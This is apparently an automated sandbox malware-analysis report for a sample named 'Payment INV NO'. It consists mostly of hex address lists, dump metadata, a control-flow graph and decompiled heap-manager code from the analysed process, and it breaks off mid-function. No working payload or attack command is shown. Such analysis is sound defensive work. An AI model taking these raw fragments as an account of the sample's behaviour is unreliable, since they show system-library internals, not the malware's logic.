                                                          0x017b5df2
                                                          0x017b5df5
                                                          0x017b5df5
                                                          0x017b5df7
                                                          0x00000000
                                                          0x00000000
                                                          0x017b6027
                                                          0x017b602b
                                                          0x017fefa9
                                                          0x017b6031
                                                          0x017b6031
                                                          0x017b6034
                                                          0x017b603a
                                                          0x017b603d
                                                          0x017b603f
                                                          0x017b603f
                                                          0x017b6042
                                                          0x017b6042
                                                          0x017b603d
                                                          0x017b6048
                                                          0x017b6052
                                                          0x017b6054
                                                          0x00000000
                                                          0x017b605a
                                                          0x017fefb2
                                                          0x017fefb4
                                                          0x00000000
                                                          0x017fefb4
                                                          0x017b6054
                                                          0x017b5dfd
                                                          0x017b5dfd
                                                          0x017b5e00
                                                          0x017b5e03
                                                          0x017b5e05
                                                          0x017b5e07
                                                          0x017fefbf
                                                          0x017fefc9
                                                          0x017b5e0d
                                                          0x017b5e0d
                                                          0x017b5e0f
                                                          0x017b5e12
                                                          0x017b5e14
                                                          0x017b5e14
                                                          0x017b5e1a
                                                          0x017b5e1d
                                                          0x017b5e23
                                                          0x017b5e26
                                                          0x017b5e28
                                                          0x00000000
                                                          0x017b5e2e
                                                          0x017b5e2e
                                                          0x017b5e31
                                                          0x017b5e31
                                                          0x017b5e34
                                                          0x017b5e36
                                                          0x00000000
                                                          0x00000000
                                                          0x017b6013
                                                          0x017b6015
                                                          0x017b6017
                                                          0x017b624e
                                                          0x017b624f
                                                          0x017b5e44
                                                          0x017b5e44
                                                          0x017b5e49
                                                          0x017b5e4c
                                                          0x017b5e4f
                                                          0x017b5e53
                                                          0x017fefd6
                                                          0x017b5e59
                                                          0x017b5e59
                                                          0x017b5e59
                                                          0x017b5e5c
                                                          0x017b5e68
                                                          0x017b5e6f
                                                          0x017b5e72
                                                          0x017b5e75
                                                          0x017b623a
                                                          0x017b623a
                                                          0x017b5e7b
                                                          0x017b5e7e
                                                          0x017b5e80
                                                          0x017b6265
                                                          0x017b6268
                                                          0x017b626b
                                                          0x017b626d
                                                          0x017b6276
                                                          0x017b6279
                                                          0x017b627d
                                                          0x017b6280
                                                          0x017b6285
                                                          0x017b6287
                                                          0x017b628d
                                                          0x017b6290
                                                          0x017b6296
                                                          0x017b62a5
                                                          0x017b62aa
                                                          0x017b62ac
                                                          0x017fefde
                                                          0x017fefed
                                                          0x017feff8
                                                          0x017feff8
                                                          0x017b62b2
                                                          0x017b62b5
                                                          0x017b62b5
                                                          0x017b62be
                                                          0x017b62c0
                                                          0x017b62c6
                                                          0x017b62c8
                                                          0x00000000
                                                          0x017b62ce
                                                          0x00000000
                                                          0x017b62ce
                                                          0x017b5e86
                                                          0x017b5e86
                                                          0x017b5e89
                                                          0x017b5e8f
                                                          0x017b5e92
                                                          0x017b5e92
                                                          0x017b5e96
                                                          0x017b5e9a
                                                          0x017b5ea0
                                                          0x017b5eb0
                                                          0x017b5eb0
                                                          0x017b5eb3
                                                          0x017b5eb3
                                                          0x017b5eb3
                                                          0x017b5eb3
                                                          0x00000000
                                                          0x017b5e96
                                                          0x017b5e80
                                                          0x017b601d
                                                          0x017b601f
                                                          0x017b601f
                                                          0x017b5e3c
                                                          0x017b5e42
                                                          0x00000000
                                                          0x017b5e42
                                                          0x017b5e28
                                                          0x017b5d58
                                                          0x017b5d5a
                                                          0x017b6123
                                                          0x017b6126
                                                          0x00000000
                                                          0x00000000
                                                          0x017b612c
                                                          0x017b612f
                                                          0x017fef74
                                                          0x017fef74
                                                          0x017b613b
                                                          0x017b613e
                                                          0x017b613e
                                                          0x017b6141
                                                          0x017b6143
                                                          0x00000000
                                                          0x00000000
                                                          0x017b6149
                                                          0x017b614c
                                                          0x017b614f
                                                          0x017b6151
                                                          0x017b6157
                                                          0x017b615a
                                                          0x017b615d
                                                          0x017b6162
                                                          0x017b6164
                                                          0x017b616a
                                                          0x017b616d
                                                          0x017b6173
                                                          0x017b6182
                                                          0x017b6187
                                                          0x017b6189
                                                          0x017fef7c
                                                          0x017fef8b
                                                          0x017fef93
                                                          0x017b618f
                                                          0x017b618f
                                                          0x017b618f
                                                          0x017b6192
                                                          0x017b6192
                                                          0x017b619b
                                                          0x017b619d
                                                          0x017b61a3
                                                          0x017b61a5
                                                          0x017b68d2
                                                          0x00000000
                                                          0x017b61ab
                                                          0x017b61ab
                                                          0x017b61ae
                                                          0x00000000
                                                          0x017b61ae
                                                          0x017b61a5
                                                          0x00000000
                                                          0x017b613e
                                                          0x017b5d60
                                                          0x017b5d63
                                                          0x017b5d70
                                                          0x017b5d76
                                                          0x017b5d86
                                                          0x017b5d8e
                                                          0x017b5d8e
                                                          0x017b5d90
                                                          0x017b5d93
                                                          0x017b5d93
                                                          0x017b5d99
                                                          0x017b5d9f
                                                          0x017b5da1
                                                          0x00000000
                                                          0x00000000
                                                          0x017b5da7
                                                          0x017b5da9
                                                          0x017b62d3
                                                          0x017b62d5
                                                          0x00000000
                                                          0x00000000
                                                          0x017b62db
                                                          0x00000000
                                                          0x017b5daf
                                                          0x017b5daf
                                                          0x017b5db2
                                                          0x017b5db4
                                                          0x00000000
                                                          0x017b5db4
                                                          0x017b5da9
                                                          0x017b608e
                                                          0x017b6091
                                                          0x017b61f3
                                                          0x017b61f6
                                                          0x017b61f8
                                                          0x017b64bb
                                                          0x017b61fe
                                                          0x017b6208
                                                          0x017b6208
                                                          0x017b6097
                                                          0x017b6097
                                                          0x017b609a
                                                          0x017b609c
                                                          0x017b62f8
                                                          0x017b60a2
                                                          0x017b60a2
                                                          0x017b60a2
                                                          0x017b609c
                                                          0x017b60ac
                                                          0x017b60ae
                                                          0x017b60b4
                                                          0x017b60b7
                                                          0x017b60bb
                                                          0x017fef9b
                                                          0x017fef9b
                                                          0x017b60c4
                                                          0x017b60c4
                                                          0x017b5ceb
                                                          0x00000000
                                                          0x017b5c89
                                                          0x017b5c57
                                                          0x017b5b93
                                                          0x017b5b59
                                                          0x017b658b
                                                          0x017b6590
                                                          0x017b6590
                                                          0x017b6590
                                                          0x017b6593
                                                          0x017b6595
                                                          0x00000000
                                                          0x00000000
                                                          0x017b6597
                                                          0x017b6599
                                                          0x017b659c
                                                          0x017b659e
                                                          0x017b65a1
                                                          0x017b65a8
                                                          0x00000000
                                                          0x017b65a8
                                                          0x017b65a3
                                                          0x017b65a3
                                                          0x017b65ab
                                                          0x017b65b6
                                                          0x017b65be
                                                          0x017b65c3
                                                          0x00000000
                                                          0x017b65c3
                                                          0x017b5991
                                                          0x017b5994
                                                          0x017b5997
                                                          0x017b599b
                                                          0x017b59a0
                                                          0x017b59aa
                                                          0x017b59ad
                                                          0x017fed6f
                                                          0x017fed74
                                                          0x017fed74
                                                          0x017b59ad
                                                          0x017b59b3
                                                          0x017b59b6
                                                          0x017b59b9
                                                          0x017fedd9
                                                          0x017feddd
                                                          0x017fedeb
                                                          0x017fedf1
                                                          0x017fedf1
                                                          0x00000000
                                                          0x017feddd
                                                          0x017b59bf
                                                          0x017b59bf
                                                          0x017b59c2
                                                          0x017b59c5
                                                          0x017b59c7
                                                          0x017b59cd
                                                          0x017b59d0
                                                          0x017b59d6
                                                          0x017b59d8
                                                          0x017b59db
                                                          0x017b59dd
                                                          0x017fedbd
                                                          0x017fedbd
                                                          0x017fedc0
                                                          0x017fedc6
                                                          0x017fedcb
                                                          0x017fedd0
                                                          0x00000000
                                                          0x017fedd0
                                                          0x017b59e3
                                                          0x017b59e6
                                                          0x017b59e8
                                                          0x00000000
                                                          0x00000000
                                                          0x017b59ee
                                                          0x017b59f1
                                                          0x017b59f7
                                                          0x017b59fa
                                                          0x017b59fc
                                                          0x017b5b23
                                                          0x017b5b23
                                                          0x017b5b29
                                                          0x017b5b2f
                                                          0x017b5b31
                                                          0x017b5b34
                                                          0x017b5b38
                                                          0x017b689f
                                                          0x017b68a4
                                                          0x017b68a6
                                                          0x00000000
                                                          0x00000000
                                                          0x017fedad
                                                          0x017fedaf
                                                          0x017fedb4
                                                          0x00000000
                                                          0x017fedb4
                                                          0x017b5b3e
                                                          0x017b5b3e
                                                          0x00000000
                                                          0x017b5a02
                                                          0x017b5a02
                                                          0x017b5a05
                                                          0x017b5a05
                                                          0x017b5a08
                                                          0x017b5a0a
                                                          0x00000000
                                                          0x00000000
                                                          0x017b5db7
                                                          0x017b5db9
                                                          0x017b5dbb
                                                          0x017b6218
                                                          0x00000000
                                                          0x017b5dc1
                                                          0x017b5dc1
                                                          0x017b5dc3
                                                          0x00000000
                                                          0x017b5dc3
                                                          0x017b5dbb
                                                          0x017b5a10
                                                          0x017b5a19
                                                          0x017b5a1e
                                                          0x017b5a21
                                                          0x017b5a24
                                                          0x017b5a28
                                                          0x017fed7e
                                                          0x017b5a2e
                                                          0x017b5a2e
                                                          0x017b5a2e
                                                          0x017b5a30
                                                          0x017b5a37
                                                          0x017b5a3d
                                                          0x017b5a3f
                                                          0x017b5a44
                                                          0x017b5a47
                                                          0x017b5a4a
                                                          0x017b5a4d
                                                          0x017b5a50
                                                          0x017b5a53
                                                          0x017b5a55
                                                          0x017b6210
                                                          0x017b6210
                                                          0x017b5a5e
                                                          0x017b5a61
                                                          0x00000000
                                                          0x017b5a67
                                                          0x017b5a67
                                                          0x017b5a6d
                                                          0x017b5a70
                                                          0x017b5a72
                                                          0x017b5a75
                                                          0x017b5a75
                                                          0x017b5a7e
                                                          0x017b5a84
                                                          0x017b5a87
                                                          0x017b5a89
                                                          0x017b5a8c
                                                          0x017b6220
                                                          0x017b6223
                                                          0x017b6226
                                                          0x017b6229
                                                          0x017b65e5
                                                          0x00000000
                                                          0x017b65e5
                                                          0x017b622f
                                                          0x017b5b08
                                                          0x017b5b08
                                                          0x017b5b1b
                                                          0x017b5b20
                                                          0x017b5b20
                                                          0x017b5b20
                                                          0x00000000
                                                          0x017b5b20
                                                          0x017b5a92
                                                          0x017b5a95
                                                          0x017b5a98
                                                          0x017b5afb
                                                          0x017b5b01
                                                          0x00000000
                                                          0x017b5b01
                                                          0x017b5a9a
                                                          0x017b5a9d
                                                          0x017b5aa0
                                                          0x017b5aa2
                                                          0x017b5aa8
                                                          0x017b5aab
                                                          0x017b5aaf
                                                          0x017b5ab4
                                                          0x017b5ab6
                                                          0x017b5abc
                                                          0x017b5abf
                                                          0x017b5ac2
                                                          0x017b5ad1
                                                          0x017b5ad6
                                                          0x017b5ad8
                                                          0x017fed86
                                                          0x017fed95
                                                          0x017fed9d
                                                          0x017fed9d
                                                          0x017b5ade
                                                          0x017b5ae1
                                                          0x017b5ae1
                                                          0x017b5aea
                                                          0x017b5aea
                                                          0x017b5aec
                                                          0x017b5af2
                                                          0x017b64f8
                                                          0x017b64fb
                                                          0x00000000
                                                          0x017b5af8
                                                          0x017b5af8
                                                          0x00000000
                                                          0x017b5af8
                                                          0x017b5af2
                                                          0x017b5a61
                                                          0x017b59fc
                                                          0x017b58d4
                                                          0x017b58cc
                                                          0x017b68c0
                                                          0x017b68c0
                                                          0x00000000
                                                          0x017b68c0
                                                          0x017b57ed
                                                          0x017b61c0
                                                          0x017b61c2
                                                          0x017b61c2
                                                          0x00000000
                                                          0x017b57e0
                                                          0x017b57b7
                                                          0x017b57bb
                                                          0x017b6307
                                                          0x017b630a
                                                          0x017b630d
                                                          0x017b6311
                                                          0x017b6316
                                                          0x017b6320
                                                          0x017b6323
                                                          0x017fec54
                                                          0x017fec59
                                                          0x017fec59
                                                          0x017b6323
                                                          0x017b6329
                                                          0x017b6329
                                                          0x017b632c
                                                          0x017b6332
                                                          0x017b6334
                                                          0x017b6337
                                                          0x017b633a
                                                          0x017b633d
                                                          0x017b633f
                                                          0x017b6342
                                                          0x017b6344
                                                          0x017fecc0
                                                          0x017fecc0
                                                          0x017fecc6
                                                          0x017feccb
                                                          0x00000000
                                                          0x017b634a
                                                          0x017b634a
                                                          0x017b634c
                                                          0x00000000
                                                          0x00000000
                                                          0x017b6355
                                                          0x017b6358
                                                          0x017b635e
                                                          0x017b6361
                                                          0x017b6363
                                                          0x017b6496
                                                          0x017b6496
                                                          0x017b6499
                                                          0x017b649c
                                                          0x017b649e
                                                          0x017b64a1
                                                          0x017b64a5
                                                          0x017b6c01
                                                          0x017b6c06
                                                          0x017b6c08
                                                          0x00000000
                                                          0x00000000
                                                          0x017fecb7
                                                          0x017fecb9
                                                          0x017fecd0
                                                          0x017fecd0
                                                          0x017fecda
                                                          0x017fece4
                                                          0x017feceb
                                                          0x017fecfb
                                                          0x00000000
                                                          0x017fecfb
                                                          0x017b64ab
                                                          0x017b64ab
                                                          0x00000000
                                                          0x017b64ab
                                                          0x017b6369
                                                          0x017b6370
                                                          0x017b6370
                                                          0x017b6373
                                                          0x017b6375
                                                          0x00000000
                                                          0x00000000
                                                          0x017b6718
                                                          0x017b671a
                                                          0x017b671c
                                                          0x017fec63
                                                          0x00000000
                                                          0x017fec63
                                                          0x017b6722
                                                          0x017b6724
                                                          0x017b6724
                                                          0x017b637b
                                                          0x017b6384
                                                          0x017b6389
                                                          0x017b638c
                                                          0x017b638f
                                                          0x017b6393
                                                          0x017fec6b
                                                          0x017b6399
                                                          0x017b6399
                                                          0x017b6399
                                                          0x017b639b
                                                          0x017b63a2
                                                          0x017b63a8
                                                          0x017b63aa
                                                          0x017b63af
                                                          0x017b63b5
                                                          0x017b63b8
                                                          0x017b63bb
                                                          0x017b63be
                                                          0x017b63c1
                                                          0x017b63c4
                                                          0x017b63c6
                                                          0x017b6bf5
                                                          0x017b6bf5
                                                          0x017b63d2
                                                          0x017b63d8
                                                          0x00000000
                                                          0x017b63de
                                                          0x017b63de
                                                          0x017b63e4
                                                          0x017b63e7
                                                          0x017b65ec
                                                          0x017b65ef
                                                          0x017b65f2
                                                          0x017b65f2
                                                          0x017b63ed
                                                          0x017b63f0
                                                          0x017b63f9
                                                          0x017b63fc
                                                          0x017b63ff
                                                          0x017b6402
                                                          0x017fec95
                                                          0x017fec98
                                                          0x017fec9b
                                                          0x017feca4
                                                          0x00000000
                                                          0x017feca4
                                                          0x017fec9d
                                                          0x00000000
                                                          0x017b6408
                                                          0x017b6408
                                                          0x017b640b
                                                          0x017b646e
                                                          0x017b6474
                                                          0x017b647b
                                                          0x017b647b
                                                          0x017b648e
                                                          0x017b6493
                                                          0x017b6493
                                                          0x017b6493
                                                          0x00000000
                                                          0x017b6493
                                                          0x017b640d
                                                          0x017b6410
                                                          0x017b6413
                                                          0x017b6415
                                                          0x017b641b
                                                          0x017b641e
                                                          0x017b6422
                                                          0x017b6427
                                                          0x017b6429
                                                          0x017b642f
                                                          0x017b6432
                                                          0x017b6438
                                                          0x017b6447
                                                          0x017b644c
                                                          0x017b644e
                                                          0x017fec73
                                                          0x017fec82
                                                          0x017fec8d
                                                          0x017fec8d
                                                          0x017b6454
                                                          0x017b6454
                                                          0x017b645d
                                                          0x017b645d
                                                          0x017b645f
                                                          0x017b6465
                                                          0x017b6706
                                                          0x017b6709
                                                          0x00000000
                                                          0x017b646b
                                                          0x017b646b
                                                          0x00000000
                                                          0x017b646b
                                                          0x017b6465
                                                          0x017b6402
                                                          0x017b63d8
                                                          0x017b6344
                                                          0x00000000
                                                          0x017b57bb
                                                          0x017b572e
                                                          0x017b5731
                                                          0x017b6509
                                                          0x017b650f
                                                          0x00000000
                                                          0x00000000
                                                          0x017b6515
                                                          0x017b651c
                                                          0x017fec26
                                                          0x017fec2d
                                                          0x00000000
                                                          0x00000000
                                                          0x017fec33
                                                          0x017b6522
                                                          0x017b6529
                                                          0x017b652f
                                                          0x017b652f
                                                          0x00000000
                                                          0x017b6529
                                                          0x017b5737
                                                          0x017b573d
                                                          0x00000000
                                                          0x00000000
                                                          0x017b574a
                                                          0x017b574c
                                                          0x017b5755
                                                          0x017b5758
                                                          0x017b5764
                                                          0x017b57ad
                                                          0x017b57ad
                                                          0x00000000
                                                          0x017b57ad
                                                          0x017b576c
                                                          0x017b576f
                                                          0x017b5775
                                                          0x017b5779
                                                          0x017b5783
                                                          0x017b66a6
                                                          0x017b66a6
                                                          0x017b66a9
                                                          0x017b66ab
                                                          0x017fec38
                                                          0x017b66b1
                                                          0x017b66b1
                                                          0x017b66b1
                                                          0x017b66b3
                                                          0x017b66ba
                                                          0x017b69ac
                                                          0x017b66c0
                                                          0x017b66c0
                                                          0x017b66c0
                                                          0x017b66cb
                                                          0x017b66ce
                                                          0x017b66d3
                                                          0x017b66d6
                                                          0x017b69b3
                                                          0x017b69ba
                                                          0x017fec42
                                                          0x017fec49
                                                          0x00000000
                                                          0x00000000
                                                          0x017fec4f
                                                          0x017b69c0
                                                          0x017b66dc
                                                          0x017b66dc
                                                          0x017b66df
                                                          0x017b66ea
                                                          0x017b66ed
                                                          0x017b66ef
                                                          0x017b66ef
                                                          0x00000000
                                                          0x017b66d6
                                                          0x017b578f
                                                          0x017b669c
                                                          0x00000000
                                                          0x017b57a3
                                                          0x017b57a3
                                                          0x00000000
                                                          0x017b57a3
                                                          0x017b56c4
                                                          0x017b56c4
                                                          0x017b56ca
                                                          0x017b56d4
                                                          0x017b56d9
                                                          0x017b6856
                                                          0x017b6859
                                                          0x017b685c
                                                          0x017b68c7
                                                          0x00000000
                                                          0x017b68c7
                                                          0x017b685e
                                                          0x017b6868
                                                          0x017b686f
                                                          0x017febf3
                                                          0x017febfd
                                                          0x017fec07
                                                          0x017fec0e
                                                          0x017fec1e
                                                          0x017b5fcf
                                                          0x017b5fcf
                                                          0x017b5fd6
                                                          0x017b5fe1
                                                          0x017b5fe4
                                                          0x017b5fe6
                                                          0x017ff58f
                                                          0x017ff592
                                                          0x00000000
                                                          0x00000000
                                                          0x017ff5a1
                                                          0x017b5ff1
                                                          0x017b5ff1
                                                          0x017b5ff4
                                                          0x017b5ff7
                                                          0x017ff5ab
                                                          0x017ff5ad
                                                          0x017ff5b3
                                                          0x017ff5b6
                                                          0x017ff5b8
                                                          0x017ff5c9
                                                          0x017ff5c9
                                                          0x017ff5b8
                                                          0x017ff5ad
                                                          0x017b5ffd
                                                          0x017b5fff
                                                          0x017b6002
                                                          0x017b6010
                                                          0x017b6010
                                                          0x017b5fec
                                                          0x017b5fec
                                                          0x00000000
                                                          0x017b5fec
                                                          0x017b6875
                                                          0x017b6885
                                                          0x017b688f
                                                          0x017b6891
                                                          0x00000000
                                                          0x017b56df
                                                          0x017b56df
                                                          0x017b56e2
                                                          0x017b56e5
                                                          0x017b56ec
                                                          0x017b56ec
                                                          0x017b56f6
                                                          0x017b56fc
                                                          0x017b56fc
                                                          0x017b5700
                                                          0x017b570b
                                                          0x017b69cc
                                                          0x017b69ce
                                                          0x017b69ce
                                                          0x017b5711
                                                          0x00000000
                                                          0x017b5711
                                                          0x017b56d9
                                                          0x017b56c2

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 8af1113e052d02650b0f4e89e31d81e6ba9f5afd6e8a03b8b086d1378b9b1d2f
                                                          • Instruction ID: 492ee27195dacc5979eb64156aeac633b66d03d7b3aef3788c6e48a2ea5329c9
                                                          • Opcode Fuzzy Hash: 8af1113e052d02650b0f4e89e31d81e6ba9f5afd6e8a03b8b086d1378b9b1d2f
                                                          • Instruction Fuzzy Hash: 23237C70A00259DFDB25CF68C4D0BEAFBB1BF49304F1481A9EA49AB386D734A945CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BB477 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 405COMMONCrypto
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 994 17bb477-17bb4a7 call 17bb8e4 997 17bb4ad-17bb4b4 994->997 998 17bb6fc-17bb6fe 994->998 1000 17bb4ba-17bb4c2 997->1000 1001 180294c-1802951 997->1001 999 17bb6b3-17bb6c3 call 17db640 998->999 1003 17bb4c8-17bb4e2 1000->1003 1004 17bb6c4-17bb6d4 1000->1004 1001->1000 1002 1802957-1802961 GetPEB 1001->1002 1006 1802980-1802985 call 179b150 1002->1006 1007 1802963-180297e GetPEB call 179b150 1002->1007 1008 17bb4e8-17bb4fa 1003->1008 1009 18029af-18029c0 RtlDebugPrintTimes 1003->1009 1011 17bb6df-17bb6ef 1004->1011 1023 180298a-180299d call 179b150 1006->1023 1007->1023 1013 17bb700-17bb70b 1008->1013 1014 17bb500-17bb519 1008->1014 1022 18029c5-18029d9 call 17d9730 1009->1022 1016 1802ad1-1802add 1011->1016 1017 17bb6f5-17bb6f7 1011->1017 1013->1014 1018 17bb711-17bb713 1013->1018 1021 17bb51f-17bb53d call 17d9660 1014->1021 1014->1022 1031 1802ae5-1802ae8 1016->1031 1025 17bb66c-17bb67a GetPEB 1017->1025 1018->1014 1034 1802a07-1802a0d 1021->1034 1035 17bb543-17bb54e GetPEB 1021->1035 1040 18029db-18029df 1022->1040 1041 18029ee-1802a01 1022->1041 1036 18029a7-18029aa 1023->1036 1037 180299f-18029a1 1023->1037 1025->1031 1032 17bb680-17bb685 1025->1032 1031->1032 1038 1802aee-1802b01 GetPEB 1031->1038 1039 17bb687-17bb68a 1032->1039 1034->998 1042 1802a12-1802a15 1035->1042 1043 17bb554 1035->1043 1036->1000 1037->1036 1038->1039 1044 1802b06-1802b13 GetPEB 1039->1044 1045 17bb690-17bb6a0 GetPEB 1039->1045 1040->1041 1046 18029e1-18029e4 1040->1046 1041->1034 1042->1043 1049 1802a1b-1802a29 GetPEB 1042->1049 1048 17bb559-17bb55c 1043->1048 1044->1045 1050 1802b19-1802b20 call 17b7d50 1044->1050 1051 17bb6a6 1045->1051 1052 1802b4f-1802b52 1045->1052 1046->1041 1053 18029e6 1046->1053 1054 17bb562-17bb566 1048->1054 1055 1802a2e-1802a3b GetPEB 1048->1055 1049->1048 1069 1802b31-1802b4a 1050->1069 1070 1802b22-1802b2b GetPEB 1050->1070 1057 17bb6a8-17bb6ab 1051->1057 1052->1051 1058 1802b58-1802b66 GetPEB 1052->1058 1053->1041 1059 17bb588-17bb5a9 1054->1059 1060 17bb568-17bb582 1054->1060 1055->1054 1061 1802a41-1802a52 1055->1061 1063 17bb6b1 1057->1063 1064 1802b6b-1802b72 call 17b7d50 1057->1064 1058->1057 1067 17bb5af-17bb5b2 1059->1067 1068 1802a66-1802a78 1059->1068 1060->1059 1066 1802a57-1802a61 1060->1066 1061->1054 1063->999 1075 1802b83-1802b95 1064->1075 1076 1802b74-1802b7d GetPEB 1064->1076 1066->1059 1067->1068 1072 17bb5b8-17bb5c4 1067->1072 1081 1802a80-1802a86 1068->1081 1069->1045 1070->1069 1077 17bb5f7-17bb621 1072->1077 1078 17bb5c6-17bb5ce 1072->1078 1088 1802b9c 1075->1088 1076->1075 1083 17bb62c-17bb639 1077->1083 1084 17bb623-17bb629 1077->1084 1078->1081 1082 17bb5d4-17bb5e4 1078->1082 1087 1802a97-1802a9a 1081->1087 1089 17bb5ea-17bb5ec 1082->1089 1090 1802ab8-1802acc 1082->1090 1085 17bb718-17bb720 1083->1085 1086 17bb63f-17bb65d call 17bb73d 1083->1086 1084->1083 1092 17bb72a-17bb738 1085->1092 1093 17bb722-17bb725 1085->1093 1101 17bb660-17bb66a 1086->1101 1094 1802a88-1802a92 1087->1094 1095 1802a9c 1087->1095 1088->1088 1089->1090 1096 17bb5f2-17bb5f4 1089->1096 1090->1077 1092->1101 1093->1086 1098 1802a94 1094->1098 1099 1802a9e-1802aa1 1094->1099 1100 1802aa2-1802ab0 call 17bbc04 1095->1100 1096->1077 1098->1087 1099->1100 1100->1090 1101->1011 1101->1025
                                                          C-Code - Quality: 67%
                                                          			E017BB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x188d360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E017BB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E017DB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x1888748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E0179B150();
						} else {
							E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(0x178d334);
						E0179B150();
						__eflags =  *0x1887bc8;
						if(__eflags == 0) {
							__eflags = 1;
							L01852073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x1888a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x188b1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
